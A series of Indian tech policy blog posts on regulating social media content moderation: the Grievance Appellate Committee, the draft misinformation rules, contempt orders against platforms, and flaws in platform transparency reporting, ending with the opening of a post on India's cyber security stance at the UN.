Re-thinking content moderation: structural solutions beyond the GAC

This post is authored by Sachin Dhawan and Vignesh Shanmugam

The grievance appellate committee (‘GAC’) provision in the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Amendment Rules, 2022 has garnered significant controversy. While it seeks to empower users to challenge the arbitrary moderation decisions of platforms, the provision itself has been criticised for being arbitrary. Lawyers, privacy advocates, technology companies, and other stakeholders have raised many  concerns about the constitutional validity of the GAC, its lack of transparency and independence, and excessive delegated power.

Although these continuing discussions on the GAC are necessary, they do not address the main concerns plaguing content moderation today. Even if sufficient legal and procedural safeguards are incorporated, the GAC will still be incapable of resolving the systemic issues in content moderation. This fundamental limitation persists because “governing content moderation by trying to regulate individual decisions is [like] using a teaspoon to remove water from a sinking ship”.  

Governments, platforms, and other stakeholders must therefore focus on: (i) examining the systemic issues which remain unaddressed by content moderation systems; and (ii) ensuring that platforms implement adequate structural measures to effectively reduce the number of individual grievances as well as systemic issues.

The limitations of the current content moderation systems

Globally, a majority of platforms rely on an individual case-by-case approach for content moderation. Due to the limited scope of this method, platforms are unable to resolve, or even identify, several types of systemic issues. This, in turn, increases the number of content moderation cases.

To illustrate the problem, here are a few examples of systemic issues which are unaddressed by content moderation systems: (i) coordinated or periodic attacks (such as mass reporting of users/posts) which target a specific class of users (based on gender, sexuality, race, caste, religion, etc.); (ii) differing content moderation criteria in different geographical locations; and (iii) errors, biases or other issues with algorithms, programs or platform design which lead to increased flagging of users/posts for content moderation.

Considering the gravity of these systemic issues, platforms must adopt effective measures to improve the standards of content moderation and reduce the number of grievances.

Addressing the structural concerns in content moderation systems

Several legal scholars have recommended the adoption of a ‘systems thinking’ approach to address the various systemic concerns in content moderation. This approach requires platforms to implement corporate structural changes, administrative practices, and procedural accountability measures for effective content moderation and grievance redressal. 

Accordingly, revising the existing content moderation frameworks in India to include the following key ‘systems thinking’ principles would ensure fairness, transparency and accountability in content moderation.

  • Establishing independent content moderation systems. Although platforms have designated content moderation divisions, these divisions are, in many cases, influenced by the platforms’ corporate or financial interests, advertisers’ interests, or political interests, which directly impacts the quality and validity of their content moderation practices. Hence, platforms must implement organisational restructuring measures to ensure that content moderation and grievance redressal processes are (i) solely undertaken by a separate and independent ‘rule-enforcement’ division; and (ii) not overruled or influenced by any other divisions in the corporate structure of the platforms. Additionally, platforms must designate a specific individual as the authorised officer in-charge of the rule-enforcement division. This ensures transparency and accountability from a corporate governance viewpoint. 
  • Robust transparency measures. Across jurisdictions, there is a growing trend of governments issuing formal or informal orders to platforms, including orders to suspend or ban specific accounts, take down specific posts, etc. In addition to ensuring transparency of the internal functioning of platforms’ content moderation systems, platforms must also provide clarity on the number of measures undertaken (and other relevant details) in compliance with such governmental orders. Ensuring that platforms’ transparency reports separately disclose the frequency and total number of such measures will provide a greater level of transparency to users, and the public at large.
  • Aggregation and assessment of claims. As stated earlier, individual cases provide limited insight into the overall systemic issues present on the platform. Platforms can gain a greater level of insight  through (i) periodic aggregation of claims received by them; and (ii) assessment of  these aggregated claims for any patterns of harm or bias (for example: assessing for the presence of algorithmic/human bias against certain demographics). Doing so will illuminate algorithmic issues, design issues, unaccounted bias, or other systemic issues which would otherwise remain unidentified and unaddressed.
  • Annual reporting of systemic issues. In order to ensure internal enforcement of systemic reform, the rule-enforcement divisions must provide annual reports to the board of directors (or the appropriate executive authority of the platform), containing systemic issues observed, recommendations for certain systemic issues, and protective measures to be undertaken by the platforms (if any). To aid in identifying further systemic issues, the division must conduct comprehensive risk assessments on a periodic basis, and record its findings in the next annual report.
  • Implementation of accountability measures. As is established corporate practice for financial, accounting, and other divisions of companies, periodic quality assurance (‘QA’) and independent auditing of the rule-enforcement division will further ensure accountability and transparency.

Conclusion

Current discussions regarding content moderation regulations are primarily centred around the GAC, and the various procedural safeguards which can rectify its flaws. However, even if the GAC  becomes an effectively functioning independent appellate forum, the systemic problems plaguing content moderation will remain unresolved. It is for this reason that platforms must actively adopt the structural measures suggested above. Doing so will (i) increase the quality of content moderation and internal grievance decisions; (ii) reduce the burden on appellate forums; and (iii) decrease the likelihood of governments imposing stringent content moderation regulations that undermine  the free speech rights of users.

Comments on the draft amendments to the IT Rules (Jan 2023)

The Ministry of Electronics and Information Technology (“MeitY”) proposed amendments to the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 (“Intermediary Guidelines”) on January 17, 2023. The draft amendments aim to regulate online gaming, but also seek to have intermediaries “make reasonable efforts” to cause their users not to upload or share content identified as “fake” or “false” by the Press Information Bureau (“PIB”), any Union Government department or authorised agency (See proposed amendment to Rule 3(1)(b)(v).) The draft amendments in their current form raise certain concerns that we believe merit additional scrutiny.  

CCG submitted comments on the proposed amendment to Rule 3(1)(b)(v), highlighting its key feedback and concerns. The comments were authored by Archit Lohani and Vasudev Devadasan and reviewed by Sachin Dhawan and Jhalak M. Kakkar. Some of the key issues raised in our comments are summarised below.

  1. Misinformation, fake, and false, include both unlawful and lawful expression

The proposed amendment does not define the term “misinformation” or provide any guidance on how determinations that content is “fake” or “false” are arrived at. Misinformation can include various forms of content, and experts have identified up to seven subtypes of misinformation such as: imposter content; fabricated content; false connection; false context; manipulated content; misleading content; and satire or parody. Different subtypes of misinformation can cause different types of harm (or no harm at all) and are treated differently under the law. Misinformation or false information thus includes both lawful and unlawful speech (e.g., satire is constitutionally protected speech).  

Within the broad ambit of misinformation, the draft amendment does not provide sufficient guidance to the PIB and government departments on what sort of expression is permissible and what should be restricted. The draft amendment effectively provides them with unfettered discretion to restrict both unlawful and lawful speech. When seeking to regulate misinformation, experts, platforms, and other countries have drawn up detailed definitions that take into consideration factors such as intention, form of sharing, virality, context, impact, public interest value, and public participation value. These definitions recognize the potential multiplicity of context, content, and propagation techniques. In the absence of clarity over what types of content may be restricted based on a clear definition of misinformation, the draft amendment will restrict both unlawful speech and constitutionally protected speech. It will thus constitute an overbroad restriction on free speech.

  1. Restricting information solely on the ground that it is “false” is constitutionally impermissible

Article 19(2) of the Indian Constitution allows the government to place reasonable restrictions on free speech in the interest of the sovereignty, integrity, or security of India, its friendly relations with foreign States, public order, decency or morality, or contempt of court. The Supreme Court has ruled that these grounds are exhaustive and speech cannot be restricted for reasons beyond Article 19(2), including where the government seeks to block content online. Crucially, Article 19(2) does not permit the State to restrict speech on the ground that it is false. If the government were to restrict “false information that may imminently cause violence”, such a restriction would be permissible as it would relate to the ground of “public order” in Article 19(2). However, if enacted, the draft amendment would restrict online speech solely on the ground that it is declared “false” or “fake” by the Union Government. This amounts to a State restriction on speech for reasons beyond those outlined in Article 19(2), and would thus be unconstitutional. Restrictions on free speech must have a direct connection to the grounds outlined in Article 19(2) and must be a necessary and proportionate restriction on citizens’ rights.

  1. Amendment does not adhere with the procedures set out in Section 69A of the IT Act

The Supreme Court upheld Section 69A of the IT Act in Shreya Singhal v Union of India inter alia because it permitted the government blocking of online content only on grounds consistent with Article 19(2) and provided important procedural safeguards, including a notice, hearing, and written order of blocking that can be challenged in court. Therefore, it is evident that the constitutionality of the government’s blocking power over is contingent on the substantive and procedural safeguards provided by Section 69A and the Information Technology (Procedure and Safeguards for Blocking for Access of Information by Public) Rules, 2009. The proposed amendment to the Intermediary Guidelines would permit the Union Government to restrict online speech in a manner that does not adhere to these safeguards. It would permit the blocking of content on grounds beyond those specified in Article 19(2), based on a unilateral determination by the Union Government, without a specific procedure for notice, hearing, or a written order.

  1. Alternate methods to counter the spread of misinformation

Any response to misinformation on social media platforms should be based on empirical evidence on the prevalence and harms of misinformation on social media. Thus, as a first step, social media companies should be required to provide greater transparency and facilitate researcher access to data. There are alternative methods to regulate the spread of misinformation that may be more effective and preserve free expression, such as labelling or flagging misinformation. We note that there does not yet exist widespread legal and industry consensus on standards for independent fact-checking, but organisations such as the ‘International Fact-Checking Network’ (IFCN) have laid down certain principles that independent fact-checking organisations should comply with. Having platforms label content pursuant to IFCN fact checks, and even notify users when the content they have interacted with has subsequently been flagged by an IFCN fact checker would provide users with valuable informational context without requiring content removal.

Guest Post: The Case Against Requiring Social Media Companies to Proactively Monitor for ‘Anti-Judiciary Content’

This post is authored by Dhruv Bhatnagar

Through an order dated July 19, 2022 (“Order”), Justice G.R. Swaminathan of the Madras High Court initiated proceedings for criminal contempt against YouTuber ‘Savukku’ Shankar. The genesis of this case is a tweet in which Shankar questioned who Justice Swaminathan met before delivering a verdict quashing criminal proceedings against another content creator. Shankar’s tweet on Justice Swaminathan has been described in the Order as ‘an innuendo intended to undermine the judge’s integrity’.

In the Order, Justice Swaminathan has observed that Chief Compliance Officers (“CCOs”) of social media companies (“SMCs”) are obligated to ensure that “content scandalising judges and judiciary” is not posted on their platforms “and if posted, [is] taken down”. To contain the proliferation of ‘anti-judiciary content’ on social media, Facebook, Twitter, and YouTube have been added as parties to this case. Their CCOs have been directed to document details of complaints received against Shankar and explain whether they have considered taking proactive steps to uphold the dignity of the judiciary.

Given that users access online speech through SMCs, compelling SMCs to exercise censorial power on behalf of State authorities is not a novel development. However, suo moto action to regulate ‘anti-judiciary content’ in India may create more problems than it would solve. After briefly discussing inconsistencies in India’s criminal contempt jurisprudence, this piece highlights the legal issues with standing judicial orders directing SMCs to proactively monitor for ‘anti-judiciary content’ on their platforms. It also catalogues the practical difficulties such orders would pose for SMCs and argues against the imposition of onerous proactive moderation obligations upon them to prevent the curtailment of users’ freedom of speech.

Criminal contempt in India: Contours and Splintered Jurisprudence

The Contempt of Courts Act, 1971 (“1971 Act”) codifies contempt both as a civil and criminal offence in India. Civil contempt refers to wilful disobedience of judicial pronouncements, whereas criminal contempt is defined as act(s) that either scandalise or lower the authority of the judiciary, interfere with the due course of judicial proceedings, or obstruct the administration of justice. Both types of contempt  are punishable with a fine of up to Rs. 2,000/-, imprisonment of up to six months, or both. The Supreme Court and High Courts, as courts of record, are both constitutionally (under Articles 129 and 215) and statutorily (under Section 15 of the 1971 Act) empowered to punish individuals for contempt of their own rulings.

Given that “scandalis[ing]” or “tend[ing] to scandalise” a court is a broad concept, judicial interpretation and principles constitute a crucial source for understanding the remit of this offence. However, there is little consistency on this front owing to a divergence in judicial decisions over the years, with some courts construing the offence in narrow terms and others broadly.

In 1978, Justice V.R. Krishna Iyer enunciated, inter-alia, the following guidelines for exercising criminal contempt jurisdiction in S. Mulgaokar (analysed here):

  • Courts should exercise a “wise economy of use” of their contempt power and should not be prompted by “easy irritability” (¶27).
  • Courts should strike a balance between the constitutional values of free criticism and the need for a fearless judicial process while deciding contempt cases. The benefit of doubt must always be given since even fierce or exaggerated criticism is not a crime (¶28).
  • Contempt is meant to prevent obstruction of justice, not offer protection to libelled judges (¶29).
  • Judges should not be hypersensitive to criticism. Instead, they should endeavour to deflate even vulgar denunciation through “condescending indifference…” (¶32).

Later, in P.N. Duda (analysed here), the Supreme Court restricted the scope of criminal contempt only to actions having a proximate connection to the obstruction of justice. The Court found that a minister’s speech assailing its judges for being prejudiced against the poor, though opinionated, was not contemptuous since it did not impair the administration of justice.

However, subsequent judgments have not always adopted this tolerant stance. For instance, in D.C. Saxena (analysed here), the Supreme Court found that the essence of this offence was lowering the dignity of judges, and even mere imputations of partiality were contemptuous. Later, in Arundhati Roy (analysed here), the Supreme Court held that opinions capable of diminishing public confidence in the judiciary also attract contempt. Here, the Court noted that the respondent had caused public injury by creating a negative impression in the minds of the people about judicial integrity. This line of reasoning deviates from Justice Krishna Iyer’s guidelines in Mulgaokar, which had advised against using contempt merely to defend the maligned reputation of judges. Not only does this rationale allow for easier invocation of the offence of contempt, but it is also premised on a paternalistic assumption that India’s impressionable citizenry may be swayed by malicious and irrelevant vilification of the judiciary.

Given the above disparity in judicial opinions, Shankar’s guilt ultimately depends on the standards applied to determine the legality of his tweet. As per the Mulgaokar principles, Shankar’s tweet may not be contemptuous since it does not present an imminent danger of interference with the administration of justice. However, if assessed according to the Saxena or Roy standard, the tweet could be considered contemptuous simply because it imputes ulterior motives to Justice Swaminathan’s decision-making.

It is submitted that the Mulgaokar principles more closely align with the constitutional requirement that restrictions on speech be ‘reasonable’ as the principles advocate only restricting speech that constitutes a proximate threat to a permissible state aim (contempt of court) set out in Article 19(2). For this reason, as general practise, it may be advisable for judges to consistently apply and endorse these principles while deciding criminal contempt cases.    

Difficulties in proactive regulation of ‘anti-judiciary content’

Justice Swaminathan’s observation in the Order that SMCs have a ‘duty to ensure content scandalising judges is not posted, and if posted is taken down’ suggests that he expects such content to be proactively identified and removed by SMCs from their platforms. However, practically, standing judicial orders imposing such broad obligations upon SMCs would not only exceed their obligations under extant Indian law but may also lead to legal speech being taken down. These concerns are elaborated below:

Incompatibility with legal obligations:

Although the Information Technology Act, 2000 does not specifically require SMCs to proactively monitor content, an obligation of this nature has been introduced through delegated legislation in Rule 4(4) of the 2021 IT Rules. This rule requires SMCs qualifying as ‘significant social media intermediaries’ (“SSMIs”) (explained here) to, inter-alia, “endeavour to deploy” technological measures to proactively identify content depicting rape, child sexual abuse or identical content previously disabled pursuant to governmental or judicial orders. However, ‘anti-judiciary content’ is not a content category which SSMIs need to endeavour to proactively identify. Thus, any judicial directions imposing this mandate upon them would exceed the scope of their legal obligations.

Further, in Shreya Singhal (analysed here), the Supreme Court expressly required a court order determining the illegality of content to be passed before SMCs were required to remove the content. However, if proactive monitoring obligations are imposed, SMCs would have to identify and remove content on their own, without a judicial determination of legality. Such obligations would also undermine the Court’s ruling in Visakha Industries (analysed here), which advised against proactive monitoring to prevent intermediaries from becoming “super censors” and “denud[ing] the internet of it[s] unique feature [as] a democratic medium for all to publish, access and read any and all kinds of information” (¶53).

Unrealistic expectations and undesirable content moderation outcomes:

Judicial orders directing SMCs to proactively disable ‘anti-judiciary content’ essentially require them to objectively and consistently enforce standards on criminal contempt on their platforms. This may be problematic considering that the doctrine of contempt emerging from constitutional courts, where judges possess a significantly higher degree of specialised knowledge on what constitutes contempt of court, is itself  ambiguous at best. Put simply, when even courts have regularly disagreed on the contours of contemptuous speech, it may be problematic to expect SMCs to take more coherent decisions.

A major risk with delegating the burden of complex decision-making about free speech to private intermediaries is excessive content removal. Across jurisdictions, platform providers have erred on the side of caution and over-removed content when faced with potential legal risks. This is evidenced through empirical studies on the notice-takedown regime for copyright infringing content in the US and due diligence obligations for intermediaries in India.

Given their documented propensity for over-compliance, directions by Indian courts requiring SMCs to proactively takedown ‘anti-judiciary content’, may incentivise excessive removal of even permissible critique of judicial actions by SMCs. This would ultimately restrict social media users’ right to free expression.

Way forward

Considering the issues outlined above, it may be advisable for the Madras High Court to refrain from imposing proactive monitoring obligations upon SMCs. Consistent with the Mulgaokar principles, judges should issue blocking directions for online contemptuous speech, in exercise of their criminal contempt jurisdiction, only against content which poses a credible threat to the obstruction of justice and not against content which they perceive to lower their reputation. Such directions should also identify specific pieces of content and not impose broad obligations on SMCs that may ultimately restrict free expression.

CCG’s Comments to the Ministry of Electronics & Information Technology on the proposed amendments to the Intermediary Guidelines 2021

On 6 June 2022, the Ministry of Electronics and Information Technology (“MeitY”), released the proposed amendments for Part 1 and Part II of the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 (“2021 IT Rules”). CCG submitted its comments on the proposed amendments to the 2021 IT Rules, highlighting its key feedback and key concerns. The comments were authored by Vasudev Devadasan and Bilal Mohamed and reviewed and edited by Jhalak M Kakkar and Shashank Mohan.

The 2021 IT Rules were released in February last year, and Part I and II of the Guidelines set out the conditions intermediaries must satisfy to avail of legal immunity for hosting unlawful content (or ‘safe harbour’) under Section 79 of the Information Technology Act, 2000 (“IT Act”). The 2021 IT Rules have been challenged in several High Courts across the country, and the Supreme Court is currently hearing a transfer petition on whether these actions should be clubbed and heard collectively by the apex court. In the meantime, the MeitY has released the proposed amendments to the 2021 IT Rules which seek to make incremental but significant changes to the Rules.

CCG’s comments to the MeitY can be summarised as follows:

Dilution of safe harbour in contravention of Section 79(1) of the IT Act

The core intention behind providing intermediaries with safe harbour under Section 79(1) of the IT Act is to ensure that intermediaries do not restrict the free flow of information online due to the risk of being held liable for the third-party content uploaded by users. The proposed amendments to Rules 3(1)(a) and 3(1)(b) of the 2021 IT Rules potentially impose an obligation on intermediaries to “cause” and “ensure” their users do not upload unlawful content. These amendments may require intermediaries to make complex determinations on the legality of speech and cause online intermediaries to remove content that may carry even the slightest risk of liability. This may result in the restriction of online speech and the corporate surveillance of Indian internet users by intermediaries. In the event that the proposed amendments are to be interpreted as not requiring intermediaries to actively prevent users from uploading unlawful content, in such a situation, we note that the proposed amendments may be functionally redundant, and we suggest they be dropped to avoid legal uncertainty.

Concerns with Grievance Appellate Committee

The proposed amendments envisage one or more Grievance Appellate Committees (“GAC”) that sit in appeal of intermediary determinations with respect to content. Users may appeal to a GAC against the decision of an intermediary to not remove content despite a user complaint, or alternatively, request a GAC to reinstate content that an intermediary has voluntarily removed or lift account restrictions that an intermediary has imposed. The creation of GAC(s) may exceed Government’s rulemaking powers under the IT Act. Further, the GAC(s) lack the necessary safeguards in its composition and operation to ensure the independence required by law of such an adjudicatory body. Such independence and impartiality may be essential as the Union Government is responsible for appointing individuals to the GAC(s) but the Union Government or its functionaries or instrumentalities may also be a party before the GAC(s). Further, we note that the originator, the legality of whose content is at dispute before a GAC, has not expressly been granted a right to hearing before the GAC. Finally, we note that the GAC(s) may lack the capacity to deal with the high volume of appeals against content and account restrictions. This may lead to situations where, in practice, only a small number of internet users are afforded redress by the GAC(s), leading to inequitable outcomes and discrimination amongst users.

Concerns with grievance redressal timeline

Under the proposed amendment to Rule 3(2), intermediaries must acknowledge the complaint by an internet user for the removal of content within 24 hours, and ‘act and redress’ this complaint within 72 hours. CCG’s comments note that 72-hour timeline to address complaints proposed by the amendment to Rule 3(2) may cause online intermediaries to over-comply with content removal requests, leading to the possible take-down of legally protected speech at the behest of frivolous user complaints. Empirical studies conducted on Indian intermediaries have demonstrated that smaller intermediaries lack the capacity and resources to make complex legal determinations of whether the content complained against violates the standards set out in Rule 3(1)(b)(i)-(x), while larger intermediaries are unable to address the high volume of complaints within short timelines – leading to the mechanical takedown of content. We suggest that any requirement that online intermediaries address user complaints within short timelines could differentiate between types of content that are ex-facie (on the face of it) illegal and causes severe harm (e.g., child-sex abuse material or gratuitous violence), and other types of content where determinations of legality may require legal or judicial expertise, like copyright or defamation.

Need for specificity in defining due diligence obligations

Rule 3(1)(m) of the proposed amendments requires intermediaries to ensure a “reasonable expectation of due diligence, privacy and transparency” to avail of safe harbour; while Rule 3(1)(n) requires intermediaries to “respect the rights accorded to the citizens under the Constitution of India.” These rules do not impose clearly ascertainable legal obligations, which may lead to increased compliance burdens, hamper enforcement, and results in inconsistent outcomes. In the absence of specific data protection legislation, the obligation to ensure a “reasonable expectation of due diligence, privacy and transparency” is unclear. The contents of fundamental rights obligations were drafted and developed in the context of citizen-State relations and may not be suitable or aptly transposed to the relations between intermediaries and users. Further, the content of ‘respecting Fundamental Rights’ under the Constitution is itself contested and open to reasonable disagreement between various State and constitutional functionaries. Requiring intermediaries to uphold such obligations will likely lead to inconsistent outcomes based on varied interpretations.

Transparency reporting under the Intermediary Guidelines is a mess: Here’s how we can improve it

The Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 (“Intermediary Guidelines”) represents India’s first attempt at regulating large social media platforms, with the Guidelines creating distinct obligations for ‘Significant Social Media Intermediaries’ (“SSMIs”). While certain provisions of the Guidelines concerning SSMIs (like the traceability requirement) are currently under legal challenge, the Guidelines also introduced a less controversial requirement that SSMIs publish monthly transparency reports regarding their content moderation activities. While this reporting requirement is arguably a step in the right direction, scrutinising the actual documents published by SSMIs reveals a patchwork of inconsistent and incomplete information – suggesting that Indian regulators need to adopt a more comprehensive approach to platform transparency.

This post briefly sets out the reporting requirement under the Intermediary Guidelines before analysing the transparency reports released by SSMIs. It highlights how a focus on figures coupled with the wide discretion granted to platforms to frame their reports undermines the goal of meaningful transparency. The figures referred to when analysing SSMI reports pertain to the February-March of 2022 reporting period, but the distinct methodologies used by each SSMI to arrive at these figures (more relevant for the present discussion) has remained broadly unchanged since reporting began in mid-2021. The post concludes by making suggestions on how the Ministry of Electronics and Information Technology (“MeitY”) can strengthen the reporting requirements under the Intermediary Guidelines.   

Transparency reporting under the Intermediary Guidelines

Social media companies structure speech on their platforms through their content moderation policies and practices, which determine when content stays online and when content is taken down. Even if content is not illegal or taken down pursuant to a court or government order, platforms may still take it down for violating their terms of service (or Community Guidelines) (let us call this content ‘violative content’ for now i.e., content that violates terms of service). However, ineffective content moderation can result in violative and even harmful content remaining online or non-violative content mistakenly being taken down. Given the centrality of content moderation to online speech, the Intermediary Guidelines seek to bring some transparency to the content moderation practices of SSMIs by requiring them to publish monthly reports on their content moderation activities. Transparency reporting helps users and the government understand the decisions made by platforms with respect to online speech. Given the opacity with which social media platforms often operate, transparency reporting requirements can be an essential tool to hold platforms accountable for ineffective or discriminatory content moderation practices.  

Rule 4(1)(d) of the Intermediary Guidelines requires SSMIs to publish monthly transparency reports specifying: (i) the details of complaints received, and actions taken in response, (ii) the number of “parts of information” proactively taken down using automated tools; and (iii) any other relevant information specified by the government. The Rule therefore covers both ‘reactive moderation’, where a platform responds to a user’s complaints against content, and ‘proactive moderation’, where the platform itself seeks out unwanted content even before a user reports it.

Transparency around reactive moderation helps us understand trends in user reporting and how responsive an SSMI is to user complaints, while disclosures on proactive moderation shed light on the scale and accuracy of an SSMI’s independent moderation activities. A key goal of both reporting datasets is to understand whether the platform is taking down as much harmful content as possible without accidentally also taking down non-violative content. Unfortunately, Rule 4(1)(d) merely requires SSMIs to report the number of links taken down during their content moderation (this is re-iterated by the MeitY’s FAQs on the Intermediary Guidelines). The problems with an overtly simplistic approach come to the fore upon an examination of the actual reports published by SSMIs.   

Contents of SSMI reports – proactive moderation

Based on its latest monthly transparency reports, Twitter proactively suspended 39,588 accounts while Google used automated tools to remove 338,938 pieces of content. However, these figures only document the scale of proactive monitoring and do not provide any insight into the accuracy of the platforms’ moderation – how accurate is the moderation in distinguishing between violative and non-violative content. The reporting also does not specify whether this content was taken down using solely automated tools, or some mix of automated tools and human review or oversight. Meta (reporting for Facebook and Instagram) reports the volume of content proactively taken down, but also provides a “Proactivity Rate”. The Proactivity Rate is defined as the percentage of content flagged proactively (before a user reported it) as a subset of all flagged content. Proactivity Rate = [proactively flagged content ÷ (proactively flagged content + user reported content)]. However, this metric is also of little use in understanding the accuracy of Meta’s automated tools. Take the following example:

Assume a platform has 100 pieces of content, of which 50 pieces violate the platforms terms of service and 50 do not. The platform relies on both proactive monitoring through automated tools and user reporting to identify violative content. Now, if the automated tools detect 49 pieces of violative content, and a user reports 1, the platform states that: ‘49 pieces of content were taken down pursuant to proactive monitoring at a Proactivity Rate of 98%’. However, this reporting does not inform citizens or regulators: (i) if the 49 pieces of content identified by the automated tools are in fact the 49 pieces that violate the platform’s terms of service (or whether the tools mistakenly took down some legitimate, non-violative content); (ii) how many users saw but did not report the content that was eventually flagged by automated tools and taken down; and (iii) what level and extent of human oversight was exercised in removing content. A high proactivity rate merely indicates that automated tools flagged more content than users, which is to be expected. Simply put, numbers aren’t everything, they only disclose the scale of content moderation and not its quality.  

This criticism begs the question, how do you understand the quality of proactive moderation? The Santa Clara Principles represent high level guidance on content moderation practices developed by international human rights organisations and academic experts to facilitate platform accountability with respect to users’ speech. The Principles require that platforms report: (i) when and how automated tools are used; (ii) the key criteria used by automated tools in making decisions; (iii) the confidence, accuracy, or success rate of automated tools, including in different languages; (iv) the extent of human oversight over automated tools; and (v) the outcomes of appeals against moderation decisions made by automated tools. This last requirement of reporting the outcome of appeals (how many users successfully got content reinstated after it was taken down by proactive monitoring) is a particularly useful metric as it provides an indicator of when the platforms themselves acknowledge that its proactive moderation was inaccurate. Draft legislation in Europe and the United States requires platforms to report how often proactive monitoring decisions are reversed. Mandating the reporting of even some of these elements under the Intermediary Guidelines would provide a clearer picture of the accuracy of proactive moderation.

Finally, it is relevant to note that Rule 4(4) of the Intermediary Guidelines requires that the automated tools for proactive monitoring of certain classes of content must be ‘reviewed for accuracy and fairness’. The desirability of such proactive monitoring aside, Rule 4(4) is not self-enforcing and does not specify whoshould undertake this review, how often it should be carried out, and whom the results should be communicated to.  

Contents of SSMI reports – reactive moderation

Transparency reporting with respect to reactive moderation aims to understand trends in user reporting of content and a platform’s responses to user flagging of content. Rule 4(1)(d) requires platforms to disclose the “details of complaints received and actions taken thereon”. However, a perusal of SSMI reporting reveals how the broad discretion granted to SSMIs to frame their reports is undermining the usefulness of the reporting.  

Google’s transparency report has the most straightforward understanding of “complaints received”, with the platform disclosing the number of ‘complaints that relate to third-party content that is believed to violate local laws or personal rights’. In other words, where users raise a complaint against a piece of content, Google reports it (30,065 complaints in February 2022). Meta on the other hand only reports complaints from: (i) a specific contact form, a link for which is provided in its ‘Help Centre’; and (ii) complaints addressed to the physical post-box mail address published on the ‘Help Centre’. For February 2022, Facebook received a mere 478 complaints, of which only 43 pertained to content (inappropriate or sexual content), while 135 were from users whose accounts have been hacked, and 59 were from users who had lost access to a group or page. If 43 user reports a month against content on Facebook seems suspiciously low, it likely is – because the method of user reporting of content that involves the least amount of friction for users (simply clicking on the post and reporting it directly) bypasses the specific contact form that Facebook uses to collate India complaints, and thus appears to be absent from Facebook’s transparency reporting. Most of Facebook’s 478 complaints for February have nothing to do with content on Facebook and offer little insight into how Facebook responds to user complaints against content or what types of content users report.

In contrast, Twitter’s transparency reporting expressly states that it does notinclude non-content related complaints (e.g., a user locked out of their account), instead limiting its transparency reporting to content related complaints – 795 complaints for March 2022: 606 of abuse or harassment, 97 of hateful conduct, and 33 of misinformation were the top categories. However, like Facebook, Twitter also has both a ‘support form’ and allows users to report content directly by clicking on it, but fails to specify from what sources “complaints” are compiled from for its India transparency reports. Twitter merely notes that ‘users can report grievances by the grievance mechanism by using the contact details of the Indian Grievance Officer’.

These apparent discrepancies in the number of complaints reported bear even greater scrutiny when the number of users of these platforms is factored in. Twitter (795 complaints/month) has an estimated 23 million users in India while Facebook (406 complaints/month) has an estimated 329 million users. It is reasonable to expect user complaints to scale with the number of users, but this is evidently not happening suggesting that these platforms are using different sources and methodologies to determine what constitutes a “complaint” for the purposes of Rule 4(1)(d). This is perhaps a useful time to discuss another SSMI, ShareChat.

ShareChat is reported to have an estimated 160 million users, and for February 2022 the platform reported 56,81,213 user complaints (substantially more than Twitter and Facebook). These complaints are content related (e.g., hate speech, spam etc.) although with 30% of complaints merely classified as ‘Others’, there is some uncertainty as to what these complaints pertain to. ShareChat’s reports states that it collates complaints from ‘reporting mechanism across the platform’. This would suggest that, unlike Facebook (and potentially Twitter), it compiles user complaint numbers from all methods a user can complain against content and not just a single form tucked away in its help centre documentation. While this may be a more holistic approach, ShareChat’s reporting suffers from other crucial deficiencies. Sharechat’s report makes no distinction between reactive and proactive moderation, merely giving a figure for content that has taken down. This makes it hard to judge how ShareChat responded to these over 56,00,000 complaints.    

Conclusion

Before concluding, it is relevant to note that no SSMI reporting discusses content that has been subjected to reduced visibility or algorithmically downranked. In the case of proactive moderation, Rule 4(1)(d) unfortunately limits itself to content that has been “removed”, although in the case of reactive moderation, reduced visibility would come within the ambit of ‘actions taken in response to complaints’ and should be reported on. Best practices would require platforms to disclose when and what content is subjected to reduced visibility to users. Rule 4(1)(d) did not form part of the draft intermediary guidelines that were subjected to public consultation in 2018, rather appearing for the first time in its current form in 2021. Ensuring broader consultation at the time of drafting may have resulted in such regulatory lacunae being eliminated and a more robust framework for transparency reporting.

That said, getting meaningful transparency reporting is a hard task. Standardising reporting procedures is a detailed and fraught process that likely requires platforms and regulators to engage in a consultative process – see this document created by Daphne Keller listing out potential problems in reporting procedures. Sample problem: “If ten users notify platforms about the same piece of content, and the platform takes it down after reviewing the first notice, is that ten successful notices, or one successful notice and nine rejected ones?” Given the scale of the regulatory and technical challenges, it is perhaps unsurprising that the transparency reporting under the Intermediary Guidelines has gotten off to a rocky start. However, Rule 4(1)(d) itself offers an avenue for improvement. The Rule allows the MeitY to specify any additional information that platforms should publish in their transparency reports. In the case of proactive monitoring, requiring platforms to specify exactly how automated tools are deployed, and when content take downs based on these tools are reversed would be a good place to start. The MeitY must also engage with the functionality and internal procedures of SSMIs to ensure that reporting is harmonised to the extent possible. For example, reporting a “complaint” for Facebook and ShareChat should ideally have some equivalence. This requires, for a start, MeitY to consult with platforms, users, civil society, and academic experts when thinking about transparency.

Cyber Security at the UN: Where Does India Stand? (Part 2)

This is the second post of a two-part series which examines India’s participation in UN-affiliated processes and debates on ICTs and international security.

The first part offered an overview of how ideological divisions are shaping UN debates around the international framework for responsible state behaviour in the cyberspace. In this post, the author evaluates India’s stated positions on ICTs and international security at forums affiliated with the UN.

Author: Sidharth Deb

Introduction

As our digital transformation story has accelerated, Indian authorities have proactively worked on domestic laws, regulations and policies to govern digital and ICT domains. Prominent examples include its net neutrality regime; the 2021 intermediary guidelines and digital media ethics regulations; a soon to be enacted data protection law; and the National Cyber Security Policy, 2013, which is undergoing an overhaul. When it comes to institutional responses, India has, inter alia, operationalised a nodal Computer Emergency Response Team (“CERT-In”), sector specific CERTs, the National Critical Information Infrastructure Protection Centre (“NCIIPC”) to secure critical information infrastructures (“CIIs”), and the National Cyber Security Coordinator within the country’s National Security Council Secretariat.

